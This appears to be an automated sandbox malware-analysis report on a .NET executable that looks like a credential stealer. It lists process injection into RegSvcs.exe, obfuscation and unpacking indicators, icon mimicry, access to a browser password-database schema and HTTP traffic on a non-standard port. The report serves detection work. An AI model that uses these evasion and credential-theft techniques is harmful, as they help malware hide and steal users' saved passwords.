Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpA7B6.tmp.3.dr, tmpA7A4.tmp.3.dr, tmpA7C7.tmp.3.dr, tmpA7C8.tmp.3.dr, tmpA7C9.tmp.3.dr, tmpA7A5.tmp.3.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: MfzXU6tKOq.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\MfzXU6tKOq.exe "C:\Users\user\Desktop\MfzXU6tKOq.exe"
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: MfzXU6tKOq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: MfzXU6tKOq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: MfzXU6tKOq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: CWHy.pdb source: MfzXU6tKOq.exe
Source:	Binary string: CWHy.pdbSHA256 source: MfzXU6tKOq.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.MfzXU6tKOq.exe.340e790.3.raw.unpack, id.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: MfzXU6tKOq.exe, LogInGUI.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	.Net Code: nx9RGXH2Sg System.Reflection.Assembly.Load(byte[])
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	.Net Code: nx9RGXH2Sg System.Reflection.Assembly.Load(byte[])

Source: MfzXU6tKOq.exe

Static PE information: 0xDC403931 [Tue Feb 4 11:27:45 2087 UTC]

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_0492F4D7 pushfd ; iretd	0_2_0492F4E6
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06ABC23C push esp; retf	0_2_06ABC23D
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Code function: 0_2_06AB8FEB push esp; retf	0_2_06AB8FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CA1861 push cs; retf	3_2_00CA1866
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CA1867 push cs; retf	3_2_00CA186A

Source: MfzXU6tKOq.exe

Static PE information: section name: .text entropy: 7.9180899249634855

Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, YvqQQi5LQSEtA1vIFA.cs	High entropy of concatenated method names: 'Dispose', 'XRN8VhAXPc', 'jPAkoC8kjS', 'adpW7sNyUE', 'AXm8HeJAlm', 'VDw8zA1AJO', 'ProcessDialogKey', 'qHyk7XqMOg', 'gSvk8URtcm', 'SGYkkSqyO6'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, FIxVroxvqejdE6OIaG.cs	High entropy of concatenated method names: 'ToString', 'TOnLnwdlrN', 'qsALobJTke', 'p4LLDPp4WS', 'ojJLP0ek5s', 'sa7L2C9Em5', 'vZSLWaORMe', 'f3eLTY4XQa', 'CIcLuqjA69', 'h6dLfCUmIq'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	High entropy of concatenated method names: 'ae8QJDev8s', 'vxcQmesOoG', 'qPlQ5Eylp2', 'zNoQetDyrT', 'lw7QiW5veM', 'qaWQpnrDuZ', 'G4uQ03qEpi', 'GdRQUavqWw', 'ddjQ1TJ7lO', 'RnuQcd35Dl'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, YWKcSAZiNp9h8FCBMb.cs	High entropy of concatenated method names: 'XLxpJno0Wq', 'mHep5jx1gx', 'IUWpiShlhM', 'KFkp0rT9vv', 'GsEpUbIO4p', 'YW4ijUxjfV', 'Fajiy2W4BG', 'skVi36R6dL', 'oMeiBwGIL8', 'q22iVwX6k6'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, UXqMOgV5SvURtcmxGY.cs	High entropy of concatenated method names: 'wU4AZgQwyJ', 'fYfAoSi5g3', 'PxOADIIJFC', 'peZAPob8k7', 'ffHA25lU9D', 'UXLAWm98nV', 'dW0ATsF9As', 'en6AuTAUQL', 'vvXAfZslXg', 'm7JAqKrygv'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, zsFXqfRIeoBPtVyXeV.cs	High entropy of concatenated method names: 'U6f80noQnN', 'XEf8Ux1yMu', 'bZc8cp2W78', 'Ne38EyequW', 'Vxy860tHWK', 'mSA8LiNp9h', 'QFgyXab11Mo7aFDE3e', 'U65xJUywKXPWqcqtGN', 'bYY88SaQkH', 'lI68QToIu7'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, a9NNWnz9bHnXJ9XOJE.cs	High entropy of concatenated method names: 'jdHIan241n', 'zDYIN1QjSd', 'JAjIMflQ6Q', 'bIZIZ1naMc', 'F15Iocs0OE', 'qUDIPQqhTS', 'nUHI27kYgZ', 'U99ICJgLiF', 'hBPI94YxwU', 'YkeIde1PLs'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, hquWfGbN9urpwyxy0t.cs	High entropy of concatenated method names: 'SNLitDm4wN', 'L56ivjSMc2', 'TLFeD0E1ij', 'LLkePRTDf0', 'DERe2cSOex', 'gV8eWfEdWI', 'b5DeTe0auG', 'nsleuUSA9W', 'DT4efLZy7U', 'DCweqQJdtQ'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, LauFip3XiVRNhAXPct.cs	High entropy of concatenated method names: 'EIYA6wqkr2', 'WSiA4gIpfO', 'HCVAAnZdo1', 'riGAFmZQ6U', 'UILAwldDaQ', 'RDPACM4WpZ', 'Dispose', 'uaCsmmoqn6', 'u98s5ov159', 'FiMsePQ2A6'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, ep76eoyyPk7bM5DK2l.cs	High entropy of concatenated method names: 'eT64BUWyGe', 'MPt4HupBNT', 'vgGs7DDOnr', 'yvTs8DYGIp', 'iUc4n4SbfV', 'QwH4gjK7st', 'MtL4XU8b5u', 'THB4So4MPX', 'd4a4YBx8bF', 'cxi4xkImLw'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, psvohwT95GnjjCxgtU.cs	High entropy of concatenated method names: 'qk00mdB5FI', 'UG80eORo7P', 'n4K0pfn23l', 'fhMpHI9nt1', 'anRpzBXWje', 'rSN073SqhG', 'pYU08HNfos', 'EMM0kr9arG', 'tbo0Q1TAmZ', 'XfT0REWDLN'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, cZuCu9XLKotE53aNYP.cs	High entropy of concatenated method names: 'h5nONWlhAc', 'lDMOMJD1sO', 'IRXOZWine3', 'J7NOoJb4Ki', 'K6FOP6HCYt', 'fKUO2s7oLp', 'zgwOTBLDSB', 'QyNOuy4aF0', 'DZ6OqykZfG', 'rx7OnWv3Ic'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, FLJvcTelaVsqNXHfyM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uplkVg9BGj', 'IeDkHvKOpB', 'r4SkzaBfBe', 'uCPQ7vuSq3', 'YYjQ8CogKN', 'zpvQkDvLvX', 'iupQQLhGGJ', 'p6iNCHPJBfBp9V89LBH'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, KPu0gLftgAq1NdILl0.cs	High entropy of concatenated method names: 'QGe09BhMNb', 'CHW0dl9KZ3', 'n3F0G0vACD', 'SY90KebOTR', 'rQc0tLritE', 'Cvj0aMxUXr', 'Upf0vuKH4M', 'HWV0NA9ngY', 'q4K0MOlvHJ', 'b5K0bILTXZ'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, suxMDplAaBQEMHhMt8.cs	High entropy of concatenated method names: 'YEl4cQckth', 'nPX4EJuJ1I', 'ToString', 'ber4m9aWk8', 'vfZ45CTaCV', 'Sqs4eWUybZ', 'ImJ4i3hHy1', 'Pgj4pQyILi', 'fwo40tB2Bf', 'd3h4UciS3t'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, QqyO6pHTt1UWliFFCt.cs	High entropy of concatenated method names: 'E8AIe9qvJO', 'y46Ii8VUso', 'CjEIpuFfEt', 'ikcI0gEbwy', 'cKvIADVYmh', 'W0GIUYXLh5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, HWcSfa88RSLEHEIkFRQ.cs	High entropy of concatenated method names: 'kZGIHE60hq', 'UBgIzpLZjT', 'VFbF7pOXNW', 'LjSF8a14uZ', 'sy4Fk4o5AF', 'QLfFQF4WyB', 'x1PFRv4txL', 'l77FJk3yuN', 'cmCFml3yTZ', 'nBNF5FAvZp'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, ewD9ERWmsIhWGOjL34.cs	High entropy of concatenated method names: 'sBRpxEDOKt', 'tgfplZ0KsN', 'mBqpjBLlbf', 'ToString', 'uNLpyb5idV', 'aTep3aU2b9', 'Wsorrb1htLgWtSQGAPT', 'yGerLD1EJsVXEj09MEk', 'RVtpUR1CPBIZF3vSOeK'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, UMVKlQ87qGFSbTrdKIo.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hIMInbP7Tl', 'hymIghxoMx', 'EmvIXjtU01', 'jy0IS9tTFC', 'RcsIYkdaKA', 'aAaIxLNy1D', 'LFDIlNk85j'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, JKOLjhkdUhoMuNimQy.cs	High entropy of concatenated method names: 'RLdGjXHob', 'VSHKD1JWA', 'CQXaF5Wkh', 'ibTvwF5eZ', 'iavMTaAEN', 'v1ibZBgdo', 'vlDrMlBNFjKdClm9Ud', 'suYafkkqVTiB3u4nkF', 'WDu1M1XqesvqoXeMGJ', 'zw0sFAd1Q'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, XqdHj08RBFq23fr1JuE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't20rAmYEyg', 'fGRrIAetQ1', 'cTgrFfl1y1', 'vDfrre4aet', 'lUZrwuHAws', 'Tm3rhZSEWV', 't9WrCiZapR'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, eoYyX8MZcp2W78fe3y.cs	High entropy of concatenated method names: 'wGCeK2LAuT', 'gKFea2kcV5', 'q5xeNfdBhU', 'cWeeMxqPdh', 'dvCe6MuYSX', 'da8eLFXva2', 'Skoe4VVvKW', 'BsuesbO8SS', 'z3MeAvlRyF', 'R6geIghlME'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, MnoQnNNBEfx1yMu4gx.cs	High entropy of concatenated method names: 'C4b5SJeNuM', 'LpA5Yulug2', 'fTq5xh6tlD', 'BsS5lfTUE3', 'F2v5jVDUcL', 'sAN5y53vZ7', 'Xec53mtSlv', 'T4P5BCuBj8', 'h5A5VsdMCl', 'NIw5H8jaHF'
Source: 0.2.MfzXU6tKOq.exe.6cf0000.5.raw.unpack, mBj6MbScOALfttq9w3.cs	High entropy of concatenated method names: 'SGP6qjmA0O', 'BXe6gekCvn', 'QQY6Sjivj4', 'nxK6YRU3bS', 'YwQ6o4aFDh', 'iiV6DiK8xB', 'aA66POZXat', 'Php62bdZtR', 'VRb6WaVsSk', 'mkH6TCgFG7'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, YvqQQi5LQSEtA1vIFA.cs	High entropy of concatenated method names: 'Dispose', 'XRN8VhAXPc', 'jPAkoC8kjS', 'adpW7sNyUE', 'AXm8HeJAlm', 'VDw8zA1AJO', 'ProcessDialogKey', 'qHyk7XqMOg', 'gSvk8URtcm', 'SGYkkSqyO6'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, FIxVroxvqejdE6OIaG.cs	High entropy of concatenated method names: 'ToString', 'TOnLnwdlrN', 'qsALobJTke', 'p4LLDPp4WS', 'ojJLP0ek5s', 'sa7L2C9Em5', 'vZSLWaORMe', 'f3eLTY4XQa', 'CIcLuqjA69', 'h6dLfCUmIq'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, SXBl9DUuhnByiBQ9xl.cs	High entropy of concatenated method names: 'ae8QJDev8s', 'vxcQmesOoG', 'qPlQ5Eylp2', 'zNoQetDyrT', 'lw7QiW5veM', 'qaWQpnrDuZ', 'G4uQ03qEpi', 'GdRQUavqWw', 'ddjQ1TJ7lO', 'RnuQcd35Dl'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, YWKcSAZiNp9h8FCBMb.cs	High entropy of concatenated method names: 'XLxpJno0Wq', 'mHep5jx1gx', 'IUWpiShlhM', 'KFkp0rT9vv', 'GsEpUbIO4p', 'YW4ijUxjfV', 'Fajiy2W4BG', 'skVi36R6dL', 'oMeiBwGIL8', 'q22iVwX6k6'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, UXqMOgV5SvURtcmxGY.cs	High entropy of concatenated method names: 'wU4AZgQwyJ', 'fYfAoSi5g3', 'PxOADIIJFC', 'peZAPob8k7', 'ffHA25lU9D', 'UXLAWm98nV', 'dW0ATsF9As', 'en6AuTAUQL', 'vvXAfZslXg', 'm7JAqKrygv'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, zsFXqfRIeoBPtVyXeV.cs	High entropy of concatenated method names: 'U6f80noQnN', 'XEf8Ux1yMu', 'bZc8cp2W78', 'Ne38EyequW', 'Vxy860tHWK', 'mSA8LiNp9h', 'QFgyXab11Mo7aFDE3e', 'U65xJUywKXPWqcqtGN', 'bYY88SaQkH', 'lI68QToIu7'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, a9NNWnz9bHnXJ9XOJE.cs	High entropy of concatenated method names: 'jdHIan241n', 'zDYIN1QjSd', 'JAjIMflQ6Q', 'bIZIZ1naMc', 'F15Iocs0OE', 'qUDIPQqhTS', 'nUHI27kYgZ', 'U99ICJgLiF', 'hBPI94YxwU', 'YkeIde1PLs'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, hquWfGbN9urpwyxy0t.cs	High entropy of concatenated method names: 'SNLitDm4wN', 'L56ivjSMc2', 'TLFeD0E1ij', 'LLkePRTDf0', 'DERe2cSOex', 'gV8eWfEdWI', 'b5DeTe0auG', 'nsleuUSA9W', 'DT4efLZy7U', 'DCweqQJdtQ'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, LauFip3XiVRNhAXPct.cs	High entropy of concatenated method names: 'EIYA6wqkr2', 'WSiA4gIpfO', 'HCVAAnZdo1', 'riGAFmZQ6U', 'UILAwldDaQ', 'RDPACM4WpZ', 'Dispose', 'uaCsmmoqn6', 'u98s5ov159', 'FiMsePQ2A6'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, ep76eoyyPk7bM5DK2l.cs	High entropy of concatenated method names: 'eT64BUWyGe', 'MPt4HupBNT', 'vgGs7DDOnr', 'yvTs8DYGIp', 'iUc4n4SbfV', 'QwH4gjK7st', 'MtL4XU8b5u', 'THB4So4MPX', 'd4a4YBx8bF', 'cxi4xkImLw'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, psvohwT95GnjjCxgtU.cs	High entropy of concatenated method names: 'qk00mdB5FI', 'UG80eORo7P', 'n4K0pfn23l', 'fhMpHI9nt1', 'anRpzBXWje', 'rSN073SqhG', 'pYU08HNfos', 'EMM0kr9arG', 'tbo0Q1TAmZ', 'XfT0REWDLN'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, cZuCu9XLKotE53aNYP.cs	High entropy of concatenated method names: 'h5nONWlhAc', 'lDMOMJD1sO', 'IRXOZWine3', 'J7NOoJb4Ki', 'K6FOP6HCYt', 'fKUO2s7oLp', 'zgwOTBLDSB', 'QyNOuy4aF0', 'DZ6OqykZfG', 'rx7OnWv3Ic'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, FLJvcTelaVsqNXHfyM.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uplkVg9BGj', 'IeDkHvKOpB', 'r4SkzaBfBe', 'uCPQ7vuSq3', 'YYjQ8CogKN', 'zpvQkDvLvX', 'iupQQLhGGJ', 'p6iNCHPJBfBp9V89LBH'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, KPu0gLftgAq1NdILl0.cs	High entropy of concatenated method names: 'QGe09BhMNb', 'CHW0dl9KZ3', 'n3F0G0vACD', 'SY90KebOTR', 'rQc0tLritE', 'Cvj0aMxUXr', 'Upf0vuKH4M', 'HWV0NA9ngY', 'q4K0MOlvHJ', 'b5K0bILTXZ'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, suxMDplAaBQEMHhMt8.cs	High entropy of concatenated method names: 'YEl4cQckth', 'nPX4EJuJ1I', 'ToString', 'ber4m9aWk8', 'vfZ45CTaCV', 'Sqs4eWUybZ', 'ImJ4i3hHy1', 'Pgj4pQyILi', 'fwo40tB2Bf', 'd3h4UciS3t'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, QqyO6pHTt1UWliFFCt.cs	High entropy of concatenated method names: 'E8AIe9qvJO', 'y46Ii8VUso', 'CjEIpuFfEt', 'ikcI0gEbwy', 'cKvIADVYmh', 'W0GIUYXLh5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, HWcSfa88RSLEHEIkFRQ.cs	High entropy of concatenated method names: 'kZGIHE60hq', 'UBgIzpLZjT', 'VFbF7pOXNW', 'LjSF8a14uZ', 'sy4Fk4o5AF', 'QLfFQF4WyB', 'x1PFRv4txL', 'l77FJk3yuN', 'cmCFml3yTZ', 'nBNF5FAvZp'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, ewD9ERWmsIhWGOjL34.cs	High entropy of concatenated method names: 'sBRpxEDOKt', 'tgfplZ0KsN', 'mBqpjBLlbf', 'ToString', 'uNLpyb5idV', 'aTep3aU2b9', 'Wsorrb1htLgWtSQGAPT', 'yGerLD1EJsVXEj09MEk', 'RVtpUR1CPBIZF3vSOeK'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, UMVKlQ87qGFSbTrdKIo.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hIMInbP7Tl', 'hymIghxoMx', 'EmvIXjtU01', 'jy0IS9tTFC', 'RcsIYkdaKA', 'aAaIxLNy1D', 'LFDIlNk85j'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, JKOLjhkdUhoMuNimQy.cs	High entropy of concatenated method names: 'RLdGjXHob', 'VSHKD1JWA', 'CQXaF5Wkh', 'ibTvwF5eZ', 'iavMTaAEN', 'v1ibZBgdo', 'vlDrMlBNFjKdClm9Ud', 'suYafkkqVTiB3u4nkF', 'WDu1M1XqesvqoXeMGJ', 'zw0sFAd1Q'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, XqdHj08RBFq23fr1JuE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't20rAmYEyg', 'fGRrIAetQ1', 'cTgrFfl1y1', 'vDfrre4aet', 'lUZrwuHAws', 'Tm3rhZSEWV', 't9WrCiZapR'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, eoYyX8MZcp2W78fe3y.cs	High entropy of concatenated method names: 'wGCeK2LAuT', 'gKFea2kcV5', 'q5xeNfdBhU', 'cWeeMxqPdh', 'dvCe6MuYSX', 'da8eLFXva2', 'Skoe4VVvKW', 'BsuesbO8SS', 'z3MeAvlRyF', 'R6geIghlME'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, MnoQnNNBEfx1yMu4gx.cs	High entropy of concatenated method names: 'C4b5SJeNuM', 'LpA5Yulug2', 'fTq5xh6tlD', 'BsS5lfTUE3', 'F2v5jVDUcL', 'sAN5y53vZ7', 'Xec53mtSlv', 'T4P5BCuBj8', 'h5A5VsdMCl', 'NIw5H8jaHF'
Source: 0.2.MfzXU6tKOq.exe.35ffce0.2.raw.unpack, mBj6MbScOALfttq9w3.cs	High entropy of concatenated method names: 'SGP6qjmA0O', 'BXe6gekCvn', 'QQY6Sjivj4', 'nxK6YRU3bS', 'YwQ6o4aFDh', 'iiV6DiK8xB', 'aA66POZXat', 'Php62bdZtR', 'VRb6WaVsSk', 'mkH6TCgFG7'

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (29).png

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49744

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
